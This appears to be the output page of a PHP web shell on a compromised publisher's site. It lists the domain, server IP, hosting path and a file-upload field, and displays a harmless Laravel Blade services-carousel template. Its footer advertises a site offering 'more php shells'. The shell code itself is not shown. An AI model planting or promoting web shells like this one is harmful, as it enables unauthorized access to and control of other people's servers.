Domain: amberpublishers.in
Server Adress: 86.38.243.169

privdayz.com

/home/u866425823/public_html/resources/views/components/
Dosya Yükle :
Current File : //home/u866425823/public_html/resources/views/components/services-carousel.blade.php

@foreach ($services as $service)
<div class="service-block-two">
    <div class="inner-box">
        <span class="count">{{ $loop->iteration }}</span>
        <div class="icon-box"><img src="{{asset('assets/images/services/icons/' . $service->serviceIcon)}}"></div>
        <h5 class="title">
            <a href="/services/{{$service->serviceSlug}}">
                {{ $service->serviceName }}
            </a>
        </h5>
        <div class="text">{{ substr($service->serviceDesc, 0, 75) }}...</div>
    </div>
</div>
@endforeach

coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.